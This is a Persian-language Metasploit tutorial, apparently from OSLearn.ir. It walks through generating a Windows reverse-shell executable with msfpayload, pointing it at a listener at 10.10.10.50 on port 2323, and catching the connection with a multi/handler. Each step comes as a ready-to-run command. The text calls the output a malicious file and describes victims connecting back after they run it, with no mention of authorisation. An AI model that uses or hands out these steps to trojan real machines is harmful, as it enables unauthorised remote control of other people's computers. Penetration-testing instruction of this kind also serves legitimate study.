منبع اصلی نوشتار زیر در این لینک قرار دارد

آموزش متااسپلویت : Binary Payloads

با سلام خدمت کاربران گرامی . جلسه ی هفتم از آموزش های متااسپلویت را در پیش رو داریم . همان طور که از عنوان مشخص است امروز در مورد ساخت پیلودی باینری صحبت خواهیم کرد و در آخر نحوه ی دسترسی گرفتن از سیستم قربانی را با استفاده از همین فایل بررسی خواهیم کرد .

لازم به ذکر است که در اکثر آموزش ها فایلی باینتری و با پسوند exe ساخته می شود اما این به این معنا نیست که فقط پیلود ما از جنس باینری می تواند باشد ! برای درک بیش تر این موضوع و هم چنین دیدن بقیه ی فرمت های موجود به شکل زیر عمل می کنیم :

root@kali:~# msfpayload -h

اما برای مشاهده ی جزییات و option های موجود بر روی پیلود خود ابتدا به شکل زیر عمل می کنیم :

root@kali:# msfpayload windows/shell_reverse_tcp O

نکته : همانند msfcli از حرف بزرگ O برای نمایش option های این payload استفاده کرده ایم .

OSLearn.ir_01

همان طور که مشاهده می کنید هر سه مقدار lport و lhost و exitfunc باید تعیین شود که دو مقدار lport و exitfunc مقادیری پیش فرض دارند . پس لازم است هر کدام از این مقدار را متناسب با شرایط خودمون تعیین کنیم . به عنوان مثال :

root@kali:# msfpayload windows/shell_reverse_tcp LHOST=10.10.10.50 LPORT=2323 O

OSLearn.ir_02

حال کافیست این تنظیمات را در قالب یک فایل باینری با پسوند exe تهیه کنیم . به شکل زیر :

root@kali:# msfpayload windows/shell_reverse_tcp LHOST=10.10.10.50 LPORT=2323 X > /root/OSLearn.exe

فایل مخرب ساخته شد ! در مرحله ی بعد باید روی پورت 2323 اصطلاحا روی حالت listen قرار بگیریم تا قربانی ها بعد از اجرای این فایل به سیستم ما متصل شوند .

برای این منظور با استفاده از msfcli که در قسمت های قبلی یادگرفتیم , به شکل زیر عمل می کنیم :

root@kali:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.10.10.50 LPORT=2323 E

OSLearn.ir_03

موفق و موید باشید .

منبع : او اس لرن دات آی آر | http://OSLearn.ir

نویسنده : E2MA3N



برچسب ها : , , ,